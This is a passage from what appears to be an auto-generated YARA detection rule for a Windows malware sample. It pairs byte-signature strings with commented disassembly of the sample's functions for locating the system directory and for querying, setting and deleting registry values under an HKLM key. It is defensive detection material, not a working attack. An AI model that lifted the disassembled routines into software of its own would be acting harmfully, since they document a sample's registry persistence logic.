AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004015b0@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - get common file path + .text:0x004015b0 + .text:0x004015b0 FUNC: int thiscall_caller sub_004015b0( void * ecx, int arg1, ) [4 XREFS] + .text:0x004015b0 + .text:0x004015b0 Stack Variables: (offset from initial top of stack) + .text:0x004015b0 4: int arg1 + .text:0x004015b0 -1028: int local1028 + .text:0x004015b0 + .text:0x004015b0 55 push ebp + .text:0x004015b1 8bec mov ebp,esp + .text:0x004015b3 81ec00040000 sub esp,1024 + .text:0x004015b9 53 push ebx + .text:0x004015ba 56 push esi + .text:0x004015bb 57 push edi + .text:0x004015bc 6800040000 push 1024 + .text:0x004015c1 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x004015c7 50 push eax + .text:0x004015c8 ff1550b04000 call dword [0x0040b050] ;kernel32.GetSystemDirectoryA(local1028,1024) + .text:0x004015ce 85c0 test eax,eax + .text:0x004015d0 7507 jnz 0x004015d9 + .text:0x004015d2 b801000000 mov eax,1 + .text:0x004015d7 eb54 jmp 0x0040162d + .text:0x004015d9 loc_004015d9: [1 XREFS] + .text:0x004015d9 bf58c04000 mov edi,0x0040c058 + .text:0x004015de 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x004015e4 83c9ff or ecx,0xffffffff + .text:0x004015e7 33c0 xor eax,eax + .text:0x004015e9 f2ae repnz: scasb + .text:0x004015eb f7d1 not ecx + .text:0x004015ed 2bf9 sub edi,ecx + .text:0x004015ef 8bf7 mov esi,edi + .text:0x004015f1 8bd9 mov ebx,ecx + .text:0x004015f3 8bfa mov edi,edx + .text:0x004015f5 83c9ff or ecx,0xffffffff + .text:0x004015f8 33c0 xor eax,eax + .text:0x004015fa f2ae repnz: scasb + .text:0x004015fc 83c7ff add edi,0xffffffff + .text:0x004015ff 8bcb mov ecx,ebx + .text:0x00401601 c1e902 shr ecx,2 + .text:0x00401604 f3a5 rep: movsd + .text:0x00401606 8bcb mov ecx,ebx + .text:0x00401608 83e103 and ecx,3 + .text:0x0040160b f3a4 rep: movsb + .text:0x0040160d 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00401613 50 push eax + .text:0x00401614 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401617 51 push ecx + .text:0x00401618 e8c3feffff call 0x004014e0 ;sub_004014e0(arg1,local1028) + .text:0x0040161d 83c408 add esp,8 + .text:0x00401620 85c0 test eax,eax + .text:0x00401622 7407 jz 0x0040162b + .text:0x00401624 b801000000 mov eax,1 + .text:0x00401629 eb02 jmp 0x0040162d + .text:0x0040162b loc_0040162b: [1 XREFS] + .text:0x0040162b 33c0 xor eax,eax + .text:0x0040162d loc_0040162d: [2 XREFS] + .text:0x0040162d 5f pop edi + .text:0x0040162e 5e pop esi + .text:0x0040162f 5b pop ebx + .text:0x00401630 8be5 mov esp,ebp + .text:0x00401632 5d pop ebp + .text:0x00401633 c3 ret + */ + $c55 = { 55 8B EC 81 EC 00 04 00 00 53 56 57 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? BF 58 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401000@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - query or enumerate registry value + .text:0x00401000 Segment: .text (40960 bytes) + .text:0x00401000 + .text:0x00401000 FUNC: int cdecl sub_00401000( ) [2 XREFS] + .text:0x00401000 + .text:0x00401000 Stack Variables: (offset from initial top of stack) + .text:0x00401000 -8: int local8 + .text:0x00401000 -12: int local12 + .text:0x00401000 + .text:0x00401000 55 push ebp + .text:0x00401001 8bec mov ebp,esp + .text:0x00401003 83ec08 sub esp,8 + .text:0x00401006 8d45f8 lea eax,dword [ebp - 8] + .text:0x00401009 50 push eax + .text:0x0040100a 683f000f00 push 0x000f003f + .text:0x0040100f 6a00 push 0 + .text:0x00401011 6840c04000 push 0x0040c040 + .text:0x00401016 6802000080 push 0x80000002 + .text:0x0040101b ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c040,0,0x000f003f,local12) + .text:0x00401021 85c0 test eax,eax + .text:0x00401023 7404 jz 0x00401029 + .text:0x00401025 33c0 xor eax,eax + .text:0x00401027 eb3d jmp 0x00401066 + .text:0x00401029 loc_00401029: [1 XREFS] + .text:0x00401029 6a00 push 0 + .text:0x0040102b 6a00 push 0 + .text:0x0040102d 6a00 push 0 + .text:0x0040102f 6a00 push 0 + .text:0x00401031 6830c04000 push 0x0040c030 + .text:0x00401036 8b4df8 mov ecx,dword [ebp - 8] + .text:0x00401039 51 push ecx + .text:0x0040103a ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c030,0,0,0,0) + .text:0x00401040 8945fc mov dword [ebp - 4],eax + .text:0x00401043 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401047 740e jz 0x00401057 + .text:0x00401049 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040104c 52 push edx + .text:0x0040104d ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401053 33c0 xor eax,eax + .text:0x00401055 eb0f jmp 0x00401066 + .text:0x00401057 loc_00401057: [1 XREFS] + .text:0x00401057 8b45f8 mov eax,dword [ebp - 8] + .text:0x0040105a 50 push eax + .text:0x0040105b ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401061 b801000000 mov eax,1 + .text:0x00401066 loc_00401066: [2 XREFS] + .text:0x00401066 8be5 mov esp,ebp + .text:0x00401068 5d pop ebp + .text:0x00401069 c3 ret + */ + $c56 = { 55 8B EC 83 EC 08 8D 45 ?? 50 68 3F 00 0F 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 EB ?? 6A 00 6A 00 6A 00 6A 00 68 30 C0 40 00 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 8B E5 5D C3 } + /* +function at 0x00401280@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - query or enumerate registry value + .text:0x00401280 + .text:0x00401280 FUNC: int cdecl sub_00401280( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [8 XREFS] + .text:0x00401280 + .text:0x00401280 Stack Variables: (offset from initial top of stack) + .text:0x00401280 28: int arg6 + .text:0x00401280 24: int arg5 + .text:0x00401280 20: int arg4 + .text:0x00401280 16: int arg3 + .text:0x00401280 12: int arg2 + .text:0x00401280 8: int arg1 + .text:0x00401280 4: int arg0 + .text:0x00401280 -8: int local8 + .text:0x00401280 -12: int local12 + .text:0x00401280 -4108: int local4108 + .text:0x00401280 -4112: int local4112 + .text:0x00401280 -4116: int local4116 + .text:0x00401280 + .text:0x00401280 55 push ebp + .text:0x00401281 8bec mov ebp,esp + .text:0x00401283 b810100000 mov eax,0x00001010 + .text:0x00401288 e8231c0000 call 0x00402eb0 ;__alloca_probe() + .text:0x0040128d 56 push esi + .text:0x0040128e 57 push edi + .text:0x0040128f c745f801100000 mov dword [ebp - 8],0x00001001 + .text:0x00401296 8d85f0efffff lea eax,dword [ebp - 4112] + .text:0x0040129c 50 push eax + .text:0x0040129d 683f000f00 push 0x000f003f + .text:0x004012a2 6a00 push 0 + .text:0x004012a4 6840c04000 push 0x0040c040 + .text:0x004012a9 6802000080 push 0x80000002 + .text:0x004012ae ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c040,0,0x000f003f,local4116) + .text:0x004012b4 85c0 test eax,eax + .text:0x004012b6 740a jz 0x004012c2 + .text:0x004012b8 b801000000 mov eax,1 + .text:0x004012bd e94f010000 jmp 0x00401411 + .text:0x004012c2 loc_004012c2: [1 XREFS] + .text:0x004012c2 8d4df8 lea ecx,dword [ebp - 8] + .text:0x004012c5 51 push ecx + .text:0x004012c6 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x004012cc 52 push edx + .text:0x004012cd 6a00 push 0 + .text:0x004012cf 6a00 push 0 + .text:0x004012d1 6830c04000 push 0x0040c030 + .text:0x004012d6 8b85f0efffff mov eax,dword [ebp - 4112] + .text:0x004012dc 50 push eax + .text:0x004012dd ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c030,0,0,local4108,local12) + .text:0x004012e3 8985f4efffff mov dword [ebp - 4108],eax + .text:0x004012e9 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x004012f0 7417 jz 0x00401309 + .text:0x004012f2 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x004012f8 51 push ecx + .text:0x004012f9 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004012ff b801000000 mov eax,1 + .text:0x00401304 e908010000 jmp 0x00401411 + .text:0x00401309 loc_00401309: [1 XREFS] + .text:0x00401309 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x0040130f 8955fc mov dword [ebp - 4],edx + .text:0x00401312 8b7dfc mov edi,dword [ebp - 4] + .text:0x00401315 8b5508 mov edx,dword [ebp + 8] + .text:0x00401318 83c9ff or ecx,0xffffffff + .text:0x0040131b 33c0 xor eax,eax + .text:0x0040131d f2ae repnz: scasb + .text:0x0040131f f7d1 not ecx + .text:0x00401321 2bf9 sub edi,ecx + .text:0x00401323 8bf7 mov esi,edi + .text:0x00401325 8bc1 mov eax,ecx + .text:0x00401327 8bfa mov edi,edx + .text:0x00401329 c1e902 shr ecx,2 + .text:0x0040132c f3a5 rep: movsd + .text:0x0040132e 8bc8 mov ecx,eax + .text:0x00401330 83e103 and ecx,3 + .text:0x00401333 f3a4 rep: movsb + .text:0x00401335 8b7d08 mov edi,dword [ebp + 8] + .text:0x00401338 83c9ff or ecx,0xffffffff + .text:0x0040133b 33c0 xor eax,eax + .text:0x0040133d f2ae repnz: scasb + .text:0x0040133f f7d1 not ecx + .text:0x00401341 83c1ff add ecx,0xffffffff + .text:0x00401344 8b55fc mov edx,dword [ebp - 4] + .text:0x00401347 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040134b 8945fc mov dword [ebp - 4],eax + .text:0x0040134e 8b7dfc mov edi,dword [ebp - 4] + .text:0x00401351 8b5510 mov edx,dword [ebp + 16] + .text:0x00401354 83c9ff or ecx,0xffffffff + .text:0x00401357 33c0 xor eax,eax + .text:0x00401359 f2ae repnz: scasb + .text:0x0040135b f7d1 not ecx + .text:0x0040135d 2bf9 sub edi,ecx + .text:0x0040135f 8bf7 mov esi,edi + .text:0x00401361 8bc1 mov eax,ecx + .text:0x00401363 8bfa mov edi,edx + .text:0x00401365 c1e902 shr ecx,2 + .text:0x00401368 f3a5 rep: movsd + .text:0x0040136a 8bc8 mov ecx,eax + .text:0x0040136c 83e103 and ecx,3 + .text:0x0040136f f3a4 rep: movsb + .text:0x00401371 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401374 83c9ff or ecx,0xffffffff + .text:0x00401377 33c0 xor eax,eax + .text:0x00401379 f2ae repnz: scasb + .text:0x0040137b f7d1 not ecx + .text:0x0040137d 83c1ff add ecx,0xffffffff + .text:0x00401380 8b55fc mov edx,dword [ebp - 4] + .text:0x00401383 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401387 8945fc mov dword [ebp - 4],eax + .text:0x0040138a 8b7dfc mov edi,dword [ebp - 4] + .text:0x0040138d 8b5518 mov edx,dword [ebp + 24] + .text:0x00401390 83c9ff or ecx,0xffffffff + .text:0x00401393 33c0 xor eax,eax + .text:0x00401395 f2ae repnz: scasb + .text:0x00401397 f7d1 not ecx + .text:0x00401399 2bf9 sub edi,ecx + .text:0x0040139b 8bf7 mov esi,edi + .text:0x0040139d 8bc1 mov eax,ecx + .text:0x0040139f 8bfa mov edi,edx + .text:0x004013a1 c1e902 shr ecx,2 + .text:0x004013a4 f3a5 rep: movsd + .text:0x004013a6 8bc8 mov ecx,eax + .text:0x004013a8 83e103 and ecx,3 + .text:0x004013ab f3a4 rep: movsb + .text:0x004013ad 8b7d18 mov edi,dword [ebp + 24] + .text:0x004013b0 83c9ff or ecx,0xffffffff + .text:0x004013b3 33c0 xor eax,eax + .text:0x004013b5 f2ae repnz: scasb + .text:0x004013b7 f7d1 not ecx + .text:0x004013b9 83c1ff add ecx,0xffffffff + .text:0x004013bc 8b55fc mov edx,dword [ebp - 4] + .text:0x004013bf 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004013c3 8945fc mov dword [ebp - 4],eax + .text:0x004013c6 8b7dfc mov edi,dword [ebp - 4] + .text:0x004013c9 8b5520 mov edx,dword [ebp + 32] + .text:0x004013cc 83c9ff or ecx,0xffffffff + .text:0x004013cf 33c0 xor eax,eax + .text:0x004013d1 f2ae repnz: scasb + .text:0x004013d3 f7d1 not ecx + .text:0x004013d5 2bf9 sub edi,ecx + .text:0x004013d7 8bf7 mov esi,edi + .text:0x004013d9 8bc1 mov eax,ecx + .text:0x004013db 8bfa mov edi,edx + .text:0x004013dd c1e902 shr ecx,2 + .text:0x004013e0 f3a5 rep: movsd + .text:0x004013e2 8bc8 mov ecx,eax + .text:0x004013e4 83e103 and ecx,3 + .text:0x004013e7 f3a4 rep: movsb + .text:0x004013e9 8b7d20 mov edi,dword [ebp + 32] + .text:0x004013ec 83c9ff or ecx,0xffffffff + .text:0x004013ef 33c0 xor eax,eax + .text:0x004013f1 f2ae repnz: scasb + .text:0x004013f3 f7d1 not ecx + .text:0x004013f5 83c1ff add ecx,0xffffffff + .text:0x004013f8 8b55fc mov edx,dword [ebp - 4] + .text:0x004013fb 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004013ff 8945fc mov dword [ebp - 4],eax + .text:0x00401402 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x00401408 51 push ecx + .text:0x00401409 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x0040140f 33c0 xor eax,eax + .text:0x00401411 loc_00401411: [2 XREFS] + .text:0x00401411 5f pop edi + .text:0x00401412 5e pop esi + .text:0x00401413 8be5 mov esp,ebp + .text:0x00401415 5d pop ebp + .text:0x00401416 c3 ret + */ + $c57 = { 55 8B EC B8 10 10 00 00 E8 ?? ?? ?? ?? 56 57 C7 45 ?? 01 10 00 00 8D 85 ?? ?? ?? ?? 50 68 3F 00 0F 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 4D ?? 51 8D 95 ?? ?? ?? ?? 52 6A 00 6A 00 68 30 C0 40 00 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 55 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C3 } + /* +function at 0x00401070@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - set registry value + .text:0x00401070 + .text:0x00401070 FUNC: int cdecl sub_00401070( int arg0, int arg1, int arg2, int arg3, ) [6 XREFS] + .text:0x00401070 + .text:0x00401070 Stack Variables: (offset from initial top of stack) + .text:0x00401070 16: int arg3 + .text:0x00401070 12: int arg2 + .text:0x00401070 8: int arg1 + .text:0x00401070 4: int arg0 + .text:0x00401070 -8: int local8 + .text:0x00401070 -4108: int local4108 + .text:0x00401070 -4112: int local4112 + .text:0x00401070 + .text:0x00401070 55 push ebp + .text:0x00401071 8bec mov ebp,esp + .text:0x00401073 b80c100000 mov eax,0x0000100c + .text:0x00401078 e8331e0000 call 0x00402eb0 ;__alloca_probe() + .text:0x0040107d 56 push esi + .text:0x0040107e 57 push edi + .text:0x0040107f b900040000 mov ecx,1024 + .text:0x00401084 33c0 xor eax,eax + .text:0x00401086 8dbdf8efffff lea edi,dword [ebp - 4104] + .text:0x0040108c f3ab rep: stosd + .text:0x0040108e aa stosb + .text:0x0040108f 8d85f8efffff lea eax,dword [ebp - 4104] + .text:0x00401095 8945fc mov dword [ebp - 4],eax + .text:0x00401098 8b7d08 mov edi,dword [ebp + 8] + .text:0x0040109b 8b55fc mov edx,dword [ebp - 4] + .text:0x0040109e 83c9ff or ecx,0xffffffff + .text:0x004010a1 33c0 xor eax,eax + .text:0x004010a3 f2ae repnz: scasb + .text:0x004010a5 f7d1 not ecx + .text:0x004010a7 2bf9 sub edi,ecx + .text:0x004010a9 8bf7 mov esi,edi + .text:0x004010ab 8bc1 mov eax,ecx + .text:0x004010ad 8bfa mov edi,edx + .text:0x004010af c1e902 shr ecx,2 + .text:0x004010b2 f3a5 rep: movsd + .text:0x004010b4 8bc8 mov ecx,eax + .text:0x004010b6 83e103 and ecx,3 + .text:0x004010b9 f3a4 rep: movsb + .text:0x004010bb 8b7d08 mov edi,dword [ebp + 8] + .text:0x004010be 83c9ff or ecx,0xffffffff + .text:0x004010c1 33c0 xor eax,eax + .text:0x004010c3 f2ae repnz: scasb + .text:0x004010c5 f7d1 not ecx + .text:0x004010c7 83c1ff add ecx,0xffffffff + .text:0x004010ca 8b55fc mov edx,dword [ebp - 4] + .text:0x004010cd 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004010d1 8945fc mov dword [ebp - 4],eax + .text:0x004010d4 8b7d0c mov edi,dword [ebp + 12] + .text:0x004010d7 8b55fc mov edx,dword [ebp - 4] + .text:0x004010da 83c9ff or ecx,0xffffffff + .text:0x004010dd 33c0 xor eax,eax + .text:0x004010df f2ae repnz: scasb + .text:0x004010e1 f7d1 not ecx + .text:0x004010e3 2bf9 sub edi,ecx + .text:0x004010e5 8bf7 mov esi,edi + .text:0x004010e7 8bc1 mov eax,ecx + .text:0x004010e9 8bfa mov edi,edx + .text:0x004010eb c1e902 shr ecx,2 + .text:0x004010ee f3a5 rep: movsd + .text:0x004010f0 8bc8 mov ecx,eax + .text:0x004010f2 83e103 and ecx,3 + .text:0x004010f5 f3a4 rep: movsb + .text:0x004010f7 8b7d0c mov edi,dword [ebp + 12] + .text:0x004010fa 83c9ff or ecx,0xffffffff + .text:0x004010fd 33c0 xor eax,eax + .text:0x004010ff f2ae repnz: scasb + .text:0x00401101 f7d1 not ecx + .text:0x00401103 83c1ff add ecx,0xffffffff + .text:0x00401106 8b55fc mov edx,dword [ebp - 4] + .text:0x00401109 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040110d 8945fc mov dword [ebp - 4],eax + .text:0x00401110 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401113 8b55fc mov edx,dword [ebp - 4] + .text:0x00401116 83c9ff or ecx,0xffffffff + .text:0x00401119 33c0 xor eax,eax + .text:0x0040111b f2ae repnz: scasb + .text:0x0040111d f7d1 not ecx + .text:0x0040111f 2bf9 sub edi,ecx + .text:0x00401121 8bf7 mov esi,edi + .text:0x00401123 8bc1 mov eax,ecx + .text:0x00401125 8bfa mov edi,edx + .text:0x00401127 c1e902 shr ecx,2 + .text:0x0040112a f3a5 rep: movsd + .text:0x0040112c 8bc8 mov ecx,eax + .text:0x0040112e 83e103 and ecx,3 + .text:0x00401131 f3a4 rep: movsb + .text:0x00401133 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401136 83c9ff or ecx,0xffffffff + .text:0x00401139 33c0 xor eax,eax + .text:0x0040113b f2ae repnz: scasb + .text:0x0040113d f7d1 not ecx + .text:0x0040113f 83c1ff add ecx,0xffffffff + .text:0x00401142 8b55fc mov edx,dword [ebp - 4] + .text:0x00401145 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401149 8945fc mov dword [ebp - 4],eax + .text:0x0040114c 8b7d14 mov edi,dword [ebp + 20] + .text:0x0040114f 8b55fc mov edx,dword [ebp - 4] + .text:0x00401152 83c9ff or ecx,0xffffffff + .text:0x00401155 33c0 xor eax,eax + .text:0x00401157 f2ae repnz: scasb + .text:0x00401159 f7d1 not ecx + .text:0x0040115b 2bf9 sub edi,ecx + .text:0x0040115d 8bf7 mov esi,edi + .text:0x0040115f 8bc1 mov eax,ecx + .text:0x00401161 8bfa mov edi,edx + .text:0x00401163 c1e902 shr ecx,2 + .text:0x00401166 f3a5 rep: movsd + .text:0x00401168 8bc8 mov ecx,eax + .text:0x0040116a 83e103 and ecx,3 + .text:0x0040116d f3a4 rep: movsb + .text:0x0040116f 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401172 83c9ff or ecx,0xffffffff + .text:0x00401175 33c0 xor eax,eax + .text:0x00401177 f2ae repnz: scasb + .text:0x00401179 f7d1 not ecx + .text:0x0040117b 83c1ff add ecx,0xffffffff + .text:0x0040117e 8b55fc mov edx,dword [ebp - 4] + .text:0x00401181 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401185 8945fc mov dword [ebp - 4],eax + .text:0x00401188 6a00 push 0 + .text:0x0040118a 8d8df4efffff lea ecx,dword [ebp - 4108] + .text:0x00401190 51 push ecx + .text:0x00401191 6a00 push 0 + .text:0x00401193 683f000f00 push 0x000f003f + .text:0x00401198 6a00 push 0 + .text:0x0040119a 6a00 push 0 + .text:0x0040119c 6a00 push 0 + .text:0x0040119e 6840c04000 push 0x0040c040 + .text:0x004011a3 6802000080 push 0x80000002 + .text:0x004011a8 ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c040,0,0,0,0x000f003f,0,local4112,0) + .text:0x004011ae 85c0 test eax,eax + .text:0x004011b0 7407 jz 0x004011b9 + .text:0x004011b2 b801000000 mov eax,1 + .text:0x004011b7 eb49 jmp 0x00401202 + .text:0x004011b9 loc_004011b9: [1 XREFS] + .text:0x004011b9 6800100000 push 0x00001000 + .text:0x004011be 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x004011c4 52 push edx + .text:0x004011c5 6a03 push 3 + .text:0x004011c7 6a00 push 0 + .text:0x004011c9 6830c04000 push 0x0040c030 + .text:0x004011ce 8b85f4efffff mov eax,dword [ebp - 4108] + .text:0x004011d4 50 push eax + .text:0x004011d5 ff151cb04000 call dword [0x0040b01c] ;advapi32.RegSetValueExA(0xfefefefe,0x0040c030,0,3,local4108,0x00001000) + .text:0x004011db 85c0 test eax,eax + .text:0x004011dd 7414 jz 0x004011f3 + .text:0x004011df 8b8df4efffff mov ecx,dword [ebp - 4108] + .text:0x004011e5 51 push ecx + .text:0x004011e6 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004011ec b801000000 mov eax,1 + .text:0x004011f1 eb0f jmp 0x00401202 + .text:0x004011f3 loc_004011f3: [1 XREFS] + .text:0x004011f3 8b95f4efffff mov edx,dword [ebp - 4108] + .text:0x004011f9 52 push edx + .text:0x004011fa ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401200 33c0 xor eax,eax + .text:0x00401202 loc_00401202: [2 XREFS] + .text:0x00401202 5f pop edi + .text:0x00401203 5e pop esi + .text:0x00401204 8be5 mov esp,ebp + .text:0x00401206 5d pop ebp + .text:0x00401207 c3 ret + */ + $c58 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 56 57 B9 00 04 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB AA 8D 85 ?? ?? ?? ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 00 10 00 00 8D 95 ?? ?? ?? ?? 52 6A 03 6A 00 68 30 C0 40 00 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C3 } + /* +function at 0x00401210@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - delete registry value + .text:0x00401210 + .text:0x00401210 FUNC: int cdecl sub_00401210( ) [2 XREFS] + .text:0x00401210 + .text:0x00401210 Stack Variables: (offset from initial top of stack) + .text:0x00401210 -8: int local8 + .text:0x00401210 -12: int local12 + .text:0x00401210 + .text:0x00401210 55 push ebp + .text:0x00401211 8bec mov ebp,esp + .text:0x00401213 83ec08 sub esp,8 + .text:0x00401216 6a00 push 0 + .text:0x00401218 8d45f8 lea eax,dword [ebp - 8] + .text:0x0040121b 50 push eax + .text:0x0040121c 6a00 push 0 + .text:0x0040121e 683f000f00 push 0x000f003f + .text:0x00401223 6a00 push 0 + .text:0x00401225 6a00 push 0 + .text:0x00401227 6a00 push 0 + .text:0x00401229 6840c04000 push 0x0040c040 + .text:0x0040122e 6802000080 push 0x80000002 + .text:0x00401233 ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c040,0,0,0,0x000f003f,0,local12,0) + .text:0x00401239 85c0 test eax,eax + .text:0x0040123b 7407 jz 0x00401244 + .text:0x0040123d b801000000 mov eax,1 + .text:0x00401242 eb35 jmp 0x00401279 + .text:0x00401244 loc_00401244: [1 XREFS] + .text:0x00401244 6830c04000 push 0x0040c030 + .text:0x00401249 8b4df8 mov ecx,dword [ebp - 8] + .text:0x0040124c 51 push ecx + .text:0x0040124d ff1514b04000 call dword [0x0040b014] 